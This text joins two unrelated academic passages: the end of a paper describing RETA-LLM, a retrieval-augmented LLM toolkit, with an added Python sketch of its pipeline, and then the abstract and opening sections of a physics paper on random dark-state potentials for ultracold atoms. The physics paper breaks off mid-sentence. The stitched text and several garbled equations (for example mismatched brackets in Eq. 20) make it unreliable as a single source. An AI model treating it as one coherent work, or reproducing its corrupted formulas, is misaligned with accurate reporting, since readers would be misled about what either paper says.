them to make judgments. Therefore, RETA-LLM can decide whether to output the generated answers or just say "_I cannot answer this question_". Noticed that all the inputs to the LLMs are wrapped in instructions or prompts. As shown in Figure 1, we disentangle the IR systems and LLMs entirely in our RETA-LLM. This separate design in our RETA-LLM leads users can customize their personal search engines and LLMs. ## 3 RETA-LLM Usage Pipeline To make the toolkit more convenient for personal usage, we provide a complete pipeline to build in-domain LLM-based system based on html resources. The pipeline is as follows: First, RETA-LLM uses Beautiful Soup package to convert the raw html files into json data in our **HTML Converter**.2 Footnote 2: Beautiful Soup, [https://beautiful-soup-4.readthedocs.io/en/latest/](https://beautiful-soup-4.readthedocs.io/en/latest/) Second, RETA-LLM follows the implementation of disentangled-retriever(Zhan et al., 2022) to build dense indexes and to conduct domain adaption from the converted json data in our **Index Builder**.3 Specifically, our method supports unsupervised training of dense retrieval models on local document collections, enabling the model to learn domain-specific knowledge in advance. Compared with the retrieval module in the popular LangChain library, our retrieval method has two advantages: (1) the model learns knowledge within the domain of local documents, enabling it to match queries more accurately, and (2) our method does not segment text, thus avoiding any negative impact on the overall semantic information of the text. We also provide a sparse retriever applying faiss(Johnson et al., 2019) package to build sparse indexes.4 Otherwise, users can also use their customized search engines as the document retrieval module. Footnote 3: disentangled-retriever, [https://github.com/jingtaozhan/disentangled-retriever](https://github.com/jingtaozhan/disentangled-retriever) Third, users need to prepare LLMs for question answering. 
For LLM loading and responding, we provide templates for Alpaca (Taori et al., 2023),5 YuLan-Chat,6 ChatGLM (Zeng et al., 2022; Du et al., 2022),7 and the GPT-3.5 API (Ouyang et al., 2022).8 If users use other LLMs, they can edit the codes and configurations in our toolkit. Footnote 4: Faiss, [https://github.com/facebookresearch/faiss](https://github.com/facebookresearch/faiss) Footnote 5: Alpaca, [https://github.com/tatsu-lab/stanford_alpaca](https://github.com/tatsu-lab/stanford_alpaca) Footnote 6: YuLan-Chat, [https://github.com/RUC-GSAI/YuLan-Chat](https://github.com/RUC-GSAI/YuLan-Chat) Footnote 7: ChatGLM, [https://github.com/THUDM/ChatGLM-6B](https://github.com/THUDM/ChatGLM-6B) Footnote 8: OpenAI’s API, [https://api.openai.com/v1/completions](https://api.openai.com/v1/completions) Footnote 9: Streamlit, [https://github.com/streamlit/streamlit](https://github.com/streamlit/streamlit) Finally, users can start their own RETA-LLM services using the streamlit package.9 More details about the usage pipeline can be found on our GitHub repository. ## 4 A RETA-LLM Service Case Based on RETA-LLM and the usage pipeline, we use the web pages on Renmin University of China's enrollment online platform,10 to build an RUC-enrollment-assistant system. The system uses a dense document retrieval module and adopts YuLan-13B as the backbone LLM. A usage case is shown in Figure 2. By incorporating IR systems, LLMs can answer in-domain questions which cannot be answered using their own knowledge alone. Footnote 10: Renmin University of China’s enrollment online platform, [https://rdzs.ruc.edu.cn](https://rdzs.ruc.edu.cn) ## 5 Conclusion and Future Work In this paper, we propose RETA-LLM to facilitate research and development of retrieval-augmented LLMs. We provide five independent modules: request rewriting, document retrieval, passage extraction, answer generation, and fact checking modules in our toolkit. Furthermore, we provide a pipeline to help users build their in-domain LLM-based systems. In the future, we are going to include more retrieval-augmented LLM strategies such as active retrieval augmented generation Jiang et al. (2023). Besides, we plan to make RETA-LLM more modularized and configurable.
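To make the retrieve-and-generate workflow of Section 2 concrete, the following minimal sketch chains the five RETA-LLM stages with the toolkit's default settings (top-K = 3, sliding window size 512 with step 256). The prompts, the `retriever`/`llm` interfaces, and the word-level windowing are illustrative assumptions of ours rather than RETA-LLM's actual code.

```python
def sliding_windows(tokens, size=512, step=256):
    """Split a retrieved document into overlapping pieces so each one fits the LLM input
    limit; 512/256 are the toolkit's default window size and step."""
    return [tokens[i:i + size] for i in range(0, max(len(tokens) - size, 0) + 1, step)]

def reta_llm_answer(request, history, retriever, llm, k=3):
    """Minimal retrieve-and-generate loop over the five RETA-LLM stages.
    `retriever` and `llm` are placeholders for a user-supplied search engine and model."""
    # 1. request rewriting: make the current request self-contained given the history
    revised = llm(f"Rewrite the request so it is self-contained.\nHistory: {history}\nRequest: {request}")
    # 2. document retrieval: top-K documents from the external corpus (K = 3 by default)
    docs = retriever(revised, top_k=k)
    # 3. passage extraction: slide a window over each document and keep the relevant parts
    fragments = []
    for doc in docs:
        for window in sliding_windows(doc.split()):   # word-level split as a stand-in for tokens
            fragments.append(llm(f"Extract the content relevant to: {revised}\n{' '.join(window)}"))
    references = "\n".join(fragments)
    # 4. answer generation grounded in the extracted references
    answer = llm(f"Answer the question using only these references.\n{references}\nQuestion: {revised}")
    # 5. fact checking: only return the answer if the references support it
    verdict = llm(f"Do the references support this answer? Reply yes or no.\n{references}\nAnswer: {answer}")
    return answer if verdict.strip().lower().startswith("yes") else "I cannot answer this question."
```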
2307.12447
Random Kronig-Penney-type potentials for ultracold atoms using dark states
A construction of a quasi-random potential for cold atoms using dark states emerging in $\Lambda$ {level configuration} is proposed. Speckle laser fields are used as a source of randomness. Anderson localisation in such potentials is studied and compared with the known results for the speckle potential itself. It is found out that the localisation length is greatly decreased due to the non-linear fashion in which dark-state potential is obtained. In effect, random dark state potentials resemble those occurring in random Kronig-Penney-type Hamiltonians.
Mateusz Łącki, Jakub Zakrzewski
2023-07-23T22:28:12Z
http://arxiv.org/abs/2307.12447v2
# Random Kronig-Penney-type potentials for ultracold atoms using dark states ###### Abstract A construction of a quasi-random potential for cold atoms using dark states emerging in \(\Lambda\) level configuration is proposed. Speckle laser fields are used as a source of randomness. Anderson localisation in such potentials is studied and compared with the known results for the speckle potential itself. It is found out that the localisation length is greatly decreased due to the non-linear fashion in which dark-state potential is obtained. In effect, random dark state potentials resemble those occurring in random Kronig-Penney-type Hamiltonians. ## I Introduction A particle moving in the potential consisting of narrow peaks may be described by Kronig-Penney-type Hamiltonians [1]. When the potential is periodic, the problem is solved by a simple Bloch approach. The presence of disorder enriches the physics. Here one can imagine that periodicity is broken either by different potential amplitudes at periodically distributed sites - the case sometimes called a compositional disorder [2] or by random position of scatterers having then structural (or positional) disorder. In both cases one typically expects Anderson localization [3] at all energies for one-dimensional (1D) system and uncorrelated disorder. The presence of correlations leads to mobility edges as predicted and verified experimentally for a number of models [4; 2; 5; 6; 7; 8; 9; 10; 11; 12; 13]. A standard way to implement potentials for ultracold atoms is to use off-resonant laser standing waves via an AC Stark effect [14]. Such light-shift potentials enabled experiments typical for condensed matter systems as manifested by e.g. the pioneering observation of Mott insulator to superfluid quantum phase transition [15]. Later research in optical lattice potentials involved the use of different atomic species that feature strong, long range interactions [16; 17; 18], creation of topological insulators [19] or studies of non-equilibrium dynamics [20]. In particular, the 1D experiments with ultracold atoms in random potentials have been conducted with the far off-resonant speckle potential [21], bichromatic fields [22] or digital mirror devices [23]. The AC Stark based approach leads, naturally, to diffraction-limitations that prohibit creating potentials with features much sharper than half of the laser wavelength. To remedy that, a construction based on ultracold atoms in many-levels coupling schemes [24; 25] was proposed. Coherent population of a dark state in the three-levels \(\Lambda\) configuration was used to create a periodic comb potential consisting of subwavelength peaks [26]. Involving more than three atomic levels [27; 28] opens possibilities for more complex potentials [29; 30]. In this work we shall use a similar \(\Lambda\) scheme to create random correlated potentials with sharp features overcoming the diffraction limit. The random dark state potential consists of very narrow peaks as described in Section II. The shapes of the potential peaks are quantitatively analized in Section III, where we discuss also basic statistical properties of this potential. The dark state potential may consist of short random peaks. In this configuration we consider Anderson localization in Section IV, linking the localization length \(L_{\mathrm{loc}}\) to the correlations functions of the potential. 
There we also make a comparison with the approximation of the potential by properly placed Dirac-delta scatterers realising a random Kronig-Penney model. Using appropriate laser configuration, there exist also a second possibility of preparing the dark state potential as consisting of sharp tall peaks of a (quasi)random height. The motion in this potential is described in the tight-binding approach in Section V. ## II The model We consider a gas of ultracold atoms of mass \(m\) confined to a 1D tube along the \(x\) axis by a tight transverse harmonic confinement in \(y,z\) realised by the potential \(V(x,y,z)=m\omega_{\perp}^{2}(y^{2}+z^{2})/2\). The \(\hbar\omega_{\perp}\) is assumed to be sufficiently large for excited transverse modes to remain unpopulated. The gas is non-interacting, which can be ensured by tuning of the scattering length via a Feshbach resonance, or by using a fermionic atom species, where \(s\)-wave contact interactions are suppressed. We assume no confinement along the \(x\) direction, but in real experiment one would use either harmonic confinement or sheet light implementing hard-wall boundary condition [31]. The atoms are driven by resonant laser light coupling three atomic (sub)levels in the \(\Lambda\) configuration as shown in Fig. 1. The Hamiltonian of the model takes the form \[H =- \frac{\hbar^{2}}{2m}\frac{d^{2}}{dx^{2}}+H_{a}, \tag{1}\] \[H_{a} = \frac{\hbar}{2}\left(\begin{array}{ccc}0&0&\Omega_{1}^{*}(x)\\ 0&0&\Omega_{2}^{*}(x)\\ \Omega_{1}(x)&\Omega_{2}(x)&-i\Gamma_{e}\end{array}\right).\] The Rabi frequencies \(\Omega_{i}\), \(i=1,2\) describe laser driving of the corresponding transitions between basis states \(|i\rangle\) and \(|3\rangle\). The \(\Gamma_{e}\) denotes the spontaneous emission decay rate of the upper state in the \(\Lambda\) scheme. The fields \(\Omega_{i}(x)\) can be due to a laser standing wave or a speckle field as discussed later on. The "atomic" part of the Hamiltonian, \(H_{a}\) for each \(x\in\mathbb{R}\) has a zero eigenvalue with associated "dark state" eigenvector: \[|D(x)\rangle\!=\!\frac{-\Omega_{2}(x)|1\rangle\!+\!\Omega_{1}(x)|2\rangle}{ \sqrt{|\Omega_{1}(x)|^{2}\!+\!|\Omega_{2}(x)|^{2}}}\!=\!\cos\alpha_{x}|2 \rangle\!-\!\sin\alpha_{x}|1\rangle. \tag{2}\] The remaining eigenvectors \(|B_{j}(x)\rangle,j=1,2\) are called bright states since they have a nonzero contribution from the excited state \(|3\rangle\). When \(\Gamma_{e}\neq 0\) the matrix \(H_{a}\) is non-Hermitian and the set of right eigenvectors \(\mathcal{B}=\{|D(x)\rangle,|B_{1}(x)\rangle,|B_{2}(x)\rangle\}\) has the associated "ket" states \(\langle D(x)|,\langle B_{j}(x)|\) that complete the biorthonormal system. The latter are always meant as proper "left" eigenvectors, and in general \(\langle B_{i}(x)|\neq|B_{i}(x)\rangle^{\dagger}\). The bright state energies are: \[E_{j}(x)=\frac{\hbar}{4}\left(-i\Gamma+(-1)^{j}\sqrt{-\Gamma_{e}^{2}+4|\Omega _{1}(x)|^{2}+4|\Omega_{2}(x)|^{2}}\right). \tag{3}\] The gap to bright states is non-zero if both \(\Omega_{1}(x),\Omega_{2}(x)\) do not vanish at some \(x\). This can be ensured e.g. when one of \(\Omega_{1}(x)\) is position-independent and non-zero. 
When expressed in the position-dependent basis \(\mathcal{B}\), defined above, the Hamiltonian (1) takes the form (see [29; 30; 32]): \[H = \frac{1}{2m}(p-A)^{2}+\sum_{i=1}^{2}E_{j}(x)|B_{j}\rangle\langle B_{j}| \tag{4}\] with \(A_{ij}=-i\hbar\langle\mathcal{B}_{i}|\partial_{x}|\mathcal{B}_{j}\rangle.\) One can always choose the local phases of basis vectors \(|1\rangle,\ldots,|3\rangle\) such that \(\Omega_{i}(x)\) are real. Then, after projection onto \(|D(x)\rangle\) state the Hamiltonian (1) reduces to the form: \[H = -\frac{\hbar^{2}}{2m}\frac{d^{2}}{dx^{2}}+V_{D}(x), \tag{5}\] where \[V_{D}(x) = -\frac{\hbar^{2}}{2m}\langle D(x)|\partial_{xx}|D(x)\rangle, \tag{6}\] is the dark state potential. Using Eq. (2) one obtains: \[V_{D}(x)=\frac{\hbar^{2}}{2m}\frac{(\Omega_{1}^{\prime}(x)\Omega_{2}(x)- \Omega_{1}(x)\Omega_{2}^{\prime}(x))^{2}}{(\Omega_{1}^{2}(x)+\Omega_{2}^{2}(x) )^{2}}=\frac{\hbar^{2}}{2m}(\alpha_{x}^{\prime})^{2}. \tag{7}\] Under the condition \[|E_{j}(x)| \gg |A_{kl}(x)|,\quad j\in\{1,2\},\ k\neq l, \tag{8}\] valid for sufficiently large \(\Omega_{i}\)[24; 33], the dark state is only very weakly depopulated. The Rabi frequencies.-The Rabi frequencies in the Hamiltonian (1) considered in this work are due to a standing/running laser wave or a speckle field. In the former case they are of the form: \[\Omega_{i}(x)=\tilde{\Omega}_{i}\sin(k_{i}x+\phi)+\tilde{\Omega}_{i}^{0}. \tag{9}\] The \(k_{i}=2\pi/\lambda_{i}\) and \(\lambda_{i}\) is the wavelength of the laser implementing \(\Omega_{i}(x)\). The value of \(k_{i}\) in Eq. (9) may be also (smoothly) controlled if the lasers creating the standing wave propagate at a finite angle with respect to \(\hat{x}\). The intensity of the lasers controls the amplitude \(\tilde{\Omega}_{i}\). Implementation of the term \(\tilde{\Omega}_{i}^{0}\) requires phase coherent projection of a running wave in the direction perpendicular to the \(\hat{x}\) axis (see [34]). The wave number \(k_{1}\) defines the recoil energy: \[E_{r}=\frac{\hbar^{2}k_{1}^{2}}{2m}. \tag{10}\] in this work we always use the recoil energy defined with respect to \(k_{1}\). Thus \(E_{r}\) carries no index "\(i\)". The potential \(V_{D}(x)\) is randomized by using random Rabi frequency \(\Omega_{i}(x)\). That may be accomplished by driving the corresponding transition with a quasi-random electric field in the form of the speckle field created by focusing the laser beam reflected from a diffusive plate. The complex amplitude of the electric field along the system is then given by the formula [35]: \[F(x)\sim\frac{e^{i\frac{2\pi l}{\lambda}}}{i\lambda f}e^{i\frac{\pi}{\lambda f} x^{2}}\int_{-R/2}^{R/2}d\rho\mu(\rho)w(\rho)e^{i\frac{\pi}{\lambda f}\rho^{2}}e^{-i \frac{2\pi}{\lambda f}\pi\rho}, \tag{11}\] Figure 1: The \(\Lambda\) level configuration considered in this work. The states \(|1\rangle,|2\rangle\), are assumed to be the ground state sublevels while \(|3\rangle\) is the excited state with the spontaneous emission rate \(\Gamma_{e}\). The Rabi frequencies \(\Omega_{i}(x)\) may be due to laser standing waves or a speckle field and are typically position dependent. with \(\lambda\) being the laser wavelength, \(f\) - the focal distance of the used lens and \(R\) indicating the size of the diffusive plate. Here we skip the index \(i\). The \(\mu(\cdot)\) are random complex phases imprinted by the diffusive surface. They are assumed to be completely random phase factors with a homogeneous probability density over a unit circle. 
The above formula is valid in the paraxial approximation, namely \(f\gg R\). The ratio \(R/f\) determines the degree to which the laser field is focused. This ratio controls the effective length scale of \(F(x)\) (11). Specifically \[\sigma_{R} = \frac{\lambda f}{\pi R},\] is the correlation length for the speckle potential, a convenient length unit for the speckle field. In this work even if several speckle fields are used simultaneously in some laser configuration, it is assumed, for simplicity, that they have the same \(\sigma_{R}\). We then define \[E_{\sigma_{R}}=\frac{\hbar^{2}}{2m\sigma_{R}^{2}}, \tag{12}\] as a characteristic speckle energy scale. It is interesting to compare the above expression to the recoil energy for a laser with same wavelength. It is \[E_{r}=(2f/R)^{2}E_{\sigma_{R}}, \tag{13}\] which for the assumed in this work ratio \(R/f=1/3\), leads to \(E_{r}=36E_{\sigma_{R}}\). The field \(F(x)\) generates a Rabi frequency \(\Omega_{i}(x)\) which may be for convenience expressed as a product of its mean value \(\tilde{\Omega}_{i}\) and the dimensionless function \(S_{i}(x)\): \[\Omega_{i}(x)=\tilde{\Omega}_{i}S_{i}(x), \tag{14}\] where \(\frac{1}{L}\int_{0}^{L}|S(x)|dx\to 1\) as \(L\to\infty\). The \(\Omega_{i}\) as above is non-zero, but it takes arbitrary small value with a finite probability. To overcome this problem (recall small \(\Omega_{i}\) may be harmful to our \(\Lambda\) scheme properties) one can add a phase coherent laser field which leads to: \[\Omega_{i}(x)=\tilde{\Omega}_{i}S_{i}(x)+\tilde{\Omega}_{i}^{0}, \tag{15}\] where both \(\tilde{\Omega}_{i}^{0},\tilde{\Omega}_{i}\) are independently controlled by intensity of the respective laser field. Again, without a loss of generality \(S_{i}(x),\tilde{\Omega}_{i}^{0},\tilde{\Omega}_{i}\in\mathbb{R}\). The Speckle potential.-The speckle laser field can be used to create an optical speckle potential via the AC Start shift in the two level system. The speckle laser field with Rabi frequency \(\Omega(x)\), detuned by \(\Delta\) from the resonance creates the optical potential \[V_{sp}(x)=\hbar\frac{\Omega^{2}(x)}{4\Delta}. \tag{16}\] The Window function.-The formula (11) takes into account the window function \(w(\cdot)\) which can be used to tune the statistical properties of \(F(x)\). We consider windows of the form \[w(\rho)=\Theta(|\rho|-R/2+W)-\Theta(|\rho|-R/2) \tag{17}\] which form a double-slit system [35]. In the simplest case, \(W=R/2\), \(w(\rho)=1\) for \(|\rho|\leq R/2\). ## III The dark state potential The features of the dark state potential \(V_{D}(x)\) depend solely on those of the dark state \(|D(x)\rangle\), compare (6). In contrast to potentials created by AC-Stark shifts, tuning the laser intensity does not necessarily modify the amplitude of the potential. Scaling of all \(\Omega_{i}\) by a common factor leaves the dressed states and \(V_{D}(x)\) unaffected due to a functional form of \(|D(x)\rangle\) [see (2)]. The amplitude and shape of \(V_{D}(x)\) is rather controlled by relative magnitudes of the two Rabi frequencies \(\Omega_{1}(x)\) and \(\Omega_{2}(x)\), which prompts us to define the dimensionless parameter: \[\epsilon_{12}=\frac{\tilde{\Omega}_{1}}{\tilde{\Omega}_{2}}=\epsilon_{21}^{-1}, \tag{18}\] controlling that aspect of the setup. Obviously when in a specific situation roles of \(\Omega_{1}(x)\) and \(\Omega_{2}(x)\) are interchangeable, then configurations for \(\epsilon_{12}=\epsilon\) and \(\epsilon_{12}=\epsilon^{-1}\) are equivalent. From Eq. 
(6) one sees that potentials peaks in \(V_{D}(x)\) occur where \(|D(x)\rangle\) changes substantially over a short distance. This may occur e.g in those places where \(\Omega_{1}(x),\Omega_{2}(x)\) go from \(\Omega_{1}(x)\ll\Omega_{2}(x)\) to \(\Omega_{1}(x)\gg\Omega_{2}(x)\) regime or vice versa. To get more insight into the genesis and shape of \(V_{D}(x)\), we first look in more detail at two important special cases. First, when \(\Omega_{2}(x)\) is due to a speckle field and \(\Omega_{1}(x)\) is constant or slowly varying on a scale much larger than the wavelength of the speckle. The potential typically consists of double-peak structures that appear near minima of \(\Omega_{2}(x)\). This is discussed below in III.1 together with basic statistical properties of this potential. Secondly, we consider the case when \(\Omega_{1}(x)\) is due to a running wave, Eq. (9). Then \(V_{D}(x)\) has sharp potential peaks near zeros of \(\Omega_{1}\), where \(\Omega_{2}(x)\) may be considered constant locally. To randomize the heights of \(V_{D}(x)\) peaks, the \(\Omega_{2}(x)\) may come from a speckle field or a running wave, Eq. (15) with a wavelength incommensurate with the \(\Omega_{1}(x)\), creating a quasiperiodic pattern. ### The \(V_{d}(x)\) near finite minima of \(\Omega_{2}\) due to a speckle field The \(\Omega_{2}(x)\) coming from the speckle field does not feature exact zeros, but rather it has local minima. Consider a minimum of \(\Omega_{2}(x)\) at \(x=x_{0}\). For \(x\approx x_{0}\) we approximate \(\Omega_{2}(x)\) as: \[\Omega_{2}(x)\equiv\tilde{\Omega}_{2}\left[b+\frac{\kappa^{2}}{2}(x-x_{0})^{2} \right]. \tag{19}\] The part in bracket is a quadratic expansion of the function \(S_{2}(x)\) around a particular minimum. We do not include the value of \(b\) in \(\tilde{\Omega}_{2}\) as we assume that the \(\tilde{\Omega}_{2}\) is defined by Eq. (15) for a given realization of \(\Omega_{2}(x)\). We consider \(\Omega_{1}(x)=\tilde{\Omega}_{1}=\text{const.}\) and \(|\Omega_{2}(x_{0})|\ll\tilde{\Omega}_{1}\). Under these assumptions, the dark state potential \(V_{D}(x)\) reveals, locally, a double peak structure (see Fig. 2a). Analytically, we have (see [34]): \[V_{D}(x)=\frac{\hbar^{2}\kappa^{2}}{2m}\frac{\epsilon_{12}^{2}\kappa^{2}(x-x_ {0})^{2}}{\left[b+\frac{\kappa^{2}}{2}(x-x_{0})^{2}\right]^{2}+\epsilon_{12}^ {2}\right]^{2}}, \tag{20}\] where \(\epsilon_{12}\) is given by Eq. (18). The value of this parameter depends only on amplitudes of the Rabi frequencies, and is the same for different minima of a single realization of \(\tilde{\Omega}_{1}(x)\). For arbitrary \(\epsilon_{12},b\) the width of this structure is \[\Delta x(b,\epsilon_{12},\kappa)=2\kappa^{-1}\sqrt{\frac{2}{3}}\sqrt{\sqrt{4b ^{2}+3\epsilon_{12}^{2}-b}} \tag{21}\] and its height is \[V_{\text{max}}(b,\epsilon_{12},\kappa)=\frac{\hbar^{2}\kappa^{2}}{2m}\frac{27 \epsilon_{12}^{2}\left(\sqrt{4b^{2}+3\epsilon_{12}^{2}}-b\right)}{8\left(b \left(\sqrt{4b^{2}+3\epsilon_{12}^{2}}+2b\right)+3\epsilon_{12}^{2}\right)^{2 }}. \tag{22}\] For \(\epsilon_{12}\gg b\) the width: \[\Delta x(b,\epsilon_{12},\kappa)\rightarrow\frac{\sqrt{8\epsilon_{12}}}{\sqrt {3}}\kappa^{-1}, \tag{23}\] and the height : \[V_{\text{max}}(b,\epsilon_{12},\kappa)\rightarrow\frac{3\sqrt{3}}{8\epsilon_{ 12}}\frac{\hbar^{2}\kappa^{2}}{2m}. \tag{24}\] If additionally \(\epsilon_{12}\to 0\) the two potential peaks converge to \(\frac{\pi}{2\sqrt{\epsilon_{12}}}\delta(x-x_{0})\). 
For \(b\gg\epsilon_{12}\) the width is \[\Delta x(b,\epsilon_{12},\kappa)\to 2k^{-1}\sqrt{\frac{2}{3}}b, \tag{25}\] and the height of both peaks is \[V_{\text{max}}(b,\epsilon_{12},\kappa)\rightarrow\frac{27\epsilon_{12}^{2}}{12 8b^{3}}\frac{\hbar^{2}\kappa^{2}}{2m}. \tag{26}\] The Figure 2c) shows the exemplary dark state potentials obtained for \(\Omega_{2}(x)\) equal to the speckle shown in Fig. 2b) with a black line, while \(\Omega_{1}\) remains position independent. The plot shows two cases \(\epsilon_{12}=1\) and \(\epsilon_{12}=0.2\) with relative peak heights following (24) and (26). For fixed \(\epsilon_{12}\) we may ascribe the value of parameter \(b_{i}\) from Eq. (19) to each of the minima of \(\Omega_{2}(x)\) at \(x_{i}\), indexed by \(i\). If the value of \(\epsilon_{12}\) is lowered, potential peaks for which \(\epsilon_{12}\gg b_{i}\) are made higher and narrower, but those that already passed to the opposite \(\epsilon_{12}\ll b_{i}\) regime have their height further reduced (see Eq. (26)). Decrease of \(\epsilon_{12}\) results in fewer sharp peaks in \(V_{D}(x)\) but height of some of those peaks can increase. Similar observations may be made in the case when \(\Omega_{1}(x)\) is not constant but is due to a speckle field itself. Figure 2d) shows the corresponding exemplary potential for same \(\Omega_{2}(x)\) as in Fig. 2c) and \(\Omega_{1}(x)\) given by the Figure 2: Panel a): shape of double peak structure of \(V_{D}(x)\) potential for the 3-level \(\Lambda\) system near quadratic minimum of \(\Omega_{2}(x)\) – Eq. (19). To reach a substantial peak height, one needs \(b\ll\epsilon_{12}\ll 1\). Panel b) shows two exemplary realizations of the speckle shape functions \(S_{i}(x)\). Panels c) and d) show the dark state potential \(V_{D}(x)\) when \(\Omega_{2}(x)=\tilde{\Omega}_{2}S_{2}(x)\). Panel c) is for a constant \(\Omega_{1}(x)=\tilde{\Omega}_{1}\) while in panel d) \(\Omega_{1}(x)=\tilde{\Omega}_{1}S_{1}(x)\). The relative strengths of \(\Omega_{1}(x)\) and \(\Omega_{2}(x)\) are indicated in the legends. red curve in Fig. 2b). Most of the potential peaks occur where one of \(\Omega_{1}(x)\), \(\Omega_{2}(x)\) has a minimum and the other may be considered approximately constant. Similarly one can use Eq. (19) applied to \(\Omega_{1}(x)\) or \(\Omega_{2}(x)\) and ascribe \(b_{i}\)'s to each minimum. Since now \(\Omega_{1}(x)\) is position dependent, in order to characterize individual peaks near minima of \(\Omega_{2}(x)\) via (20) we have to substitute \(\epsilon_{12}\to\epsilon_{12,i}\) where \[\epsilon_{12,i}=\frac{\tilde{\Omega}_{1}S_{1}(x_{i})}{\tilde{\Omega}_{2}}, \tag{27}\] with \(\epsilon_{12,i}\) specific for each minimum. In case of the minima of \(\Omega_{1}\), we consider \(\epsilon_{21,i}\) defined as above with swapped \(\Omega_{1}\) and \(\Omega_{2}\). Let us consider reducing the amplitude \(\tilde{\Omega}_{1}\). As \(\epsilon_{12,i}\sim\tilde{\Omega}_{1}\), the discussion of regimes \(\epsilon_{12,i}\ll b_{i}\) vs \(\epsilon_{12,i}\gg b_{i}\) carried out for constant \(\Omega_{1}(x)\) still applies. The potential peaks near the minima of \(\Omega_{1}(x)\) are characterized by \(\epsilon_{21,i}\sim\tilde{\Omega}_{1}^{-1}\). Thus for smaller and smaller \(\tilde{\Omega}_{1}\) height of the latter family of peaks is reduced as well. Let us now see how the above observations manifest in statistical properties of the potential \(V_{D}(x)\). 
Figure 3 presents \(\bar{V}_{D}\) - the mean, and \(\bar{\Delta}V_{D}\) - the standard deviation of \(V_{D}(x)\) as a function of \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\) for the case of constant \(\Omega_{1}(x)=\tilde{\Omega}_{1}\) (panel a) and for the case when \(\Omega_{1}(x)=\tilde{\Omega}_{1}S_{1}(x)\) (panel b). In the latter there is an obvious symmetry \((\tilde{\Omega}_{1},\tilde{\Omega}_{2})\to(\tilde{\Omega}_{2},\tilde{\Omega}_ {1})\). In both cases for \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}<1\), as this ratio decreases, the standard deviation of \(V_{D}(x)\) grows, and mean \(\bar{V}_{D}\) converges to a constant. This is consistent with increasingly more sparse minima satisfying \(b_{i}\ll\epsilon_{12}\) (or \(b_{i}\ll\epsilon_{12,i}\) for panel b) ). For large values of \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\), in case of constant \(\Omega_{1}(x)=\tilde{\Omega}_{1}\gg\Omega_{2}(x)\), we approximately have: \[|D(x)\rangle\approx-\frac{\Omega_{2}(x)}{\tilde{\Omega}_{1}}|1\rangle+|2\rangle, \tag{28}\] and: \[V_{D}(x)\approx\frac{\Omega_{2}^{\prime}(x)^{2}}{\tilde{\Omega}_{1}^{2}}=(S_{ 2}^{\prime}(x))^{2}\epsilon_{12}^{-2}. \tag{29}\] This means that both the mean height \(\bar{V}_{D}\) and the standard deviation \(\bar{\Delta}V_{D}\) decrease to \(0\), for increasing \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\). Their ratio \(\bar{\Delta}V_{D}/\bar{V}_{D}\to 1.32\pm 0.02\) as seen in Fig. 3a). This limit is larger than the \(\bar{\Delta}V_{sp}/\bar{V}_{sp}\to 1\) for the far-detuned AC-Stark optical potential \(V_{sp}(x)\) created by laser speckle, in a standard optical lattice setting where \(V_{sp}(x)\sim\Omega_{1}^{2}(x)/(4\delta)\) (with \(\delta\) the detuning from the resonance). In the situation when both \(\Omega_{1}(x)\) and \(\Omega_{2}(x)\) are due to speckle fields, the standard deviation \(\tilde{\Delta}V_{D}\) decreases towards a minimum at exactly \(\tilde{\Omega}_{1}=\tilde{\Omega}_{2}\). For both \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\to 0\) and \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\to\infty\) the behaviour of \(\bar{\Delta}V_{D}\) is similar to the case of constant \(\Omega_{1}(x)\). The marked difference is that \(\bar{V}_{D}\) is \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\)-independent. Qualitatively speaking, this is because change of \(\tilde{\Omega}_{1}/\tilde{\Omega}_{2}\) has the opposite effect on potential peaks near minima of \(\Omega_{2}(x)\) and \(\Omega_{1}(x)\) when it comes to their height and width. In Fig. 3 we mark with the dashed lines results for two cases discussed above when the obstacle is put onto the diffusive plate. We chose to illustrate this by setting the parameter \(W=R/5\), in Eq. (11) (note that the case \(W=R/2\) corresponds to no obstacle). The obstacle suppresses low frequencies from the Fourier expansion of the \(F(x)\) and the resulting potential \(V_{D}(x)\) has higher mean and variance. ### The dark state potential near zeros of \(\Omega_{i}\)'s Let us now consider the situation when \(\Omega_{1}(x)\) posses a zero over the real axis at \(x=x_{i}\), as in, e.g., the case of \(\Omega_{1}(x)\) being due to a standing wave, Eq. (9). We assume \(\Omega_{2}(x)\) to be locally constant \(\Omega_{2}(x)\approx\tilde{\Omega}_{2,i}\) near \(x_{i}\). This creates the setting similar to the dark state lattice proposal [24]. 
We then linearize \[\Omega_{1}(x)\approx\tilde{\Omega}_{1}k_{1}(x-x_{0}), \tag{30}\] which gives \(V_{D}(x)\) of the form: \[V_{D}(x)\approx\frac{\epsilon_{21,i}^{2}E_{r}}{[k_{1}^{2}(x-x_{0})^{2}+\epsilon_{ 21,i}^{2}]^{2}} \tag{31}\] It describes a peak of width \(\sim\epsilon_{21,i}\lambda_{1}\) and height \(\epsilon_{21,i}^{-2}E_{r}\) with \(\epsilon_{21,i}=\tilde{\Omega}_{2,i}/\tilde{\Omega}_{1}\) (see Fig. 4a). In the limit \(\epsilon_{21,i}\to 0\) each of the potential peaks converges to \(\frac{\pi}{2\epsilon_{21,i}}\delta(x-x_{0})\). If \(\Omega_{2}(x)\) were truly constant, the subsequent peaks would create a lattice of narrow peaks of identical shape and height, just as in [24]. To randomize them, we use pseudorandom \(\Omega_{2}(x)\). We discuss two possibilities. One option is to choose \(\Omega_{2}(x)\) as in Eq. (9) with \(k_{1}/k_{2}\neq\mathbb{Q}\). In that case for different \(x_{i}\) such that \(\Omega_{1}(x_{i})=0\) we have \(\epsilon_{21,i}\) that vary between \(\epsilon_{-}=\max(0,[-\tilde{\Omega}_{2}+\tilde{\Omega}_{2}^{0}]/\tilde{ \Omega}_{1})\) and \(\epsilon_{+}=[\tilde{\Omega}_{2}+\tilde{\Omega}_{2}^{0}]/\tilde{\Omega}_{1}\). This translates into pseudo-random height and width of subsequent peaks of \(V_{D}(x)\) determined by subsequent \(\epsilon_{21,i}\)'s. The resulting potential consisting of equidistant pseudo-random peaks is shown in Fig. 4b) for \(\epsilon_{+}=0.15\) and \(\epsilon_{-}=0.1\). The expressions for \(\epsilon_{-}\), \(\epsilon_{+}\) show that one can control the amplitude of the disorder simply by changing \(\tilde{\Omega}_{2}\), \(\tilde{\Omega}_{2}^{0}\) and 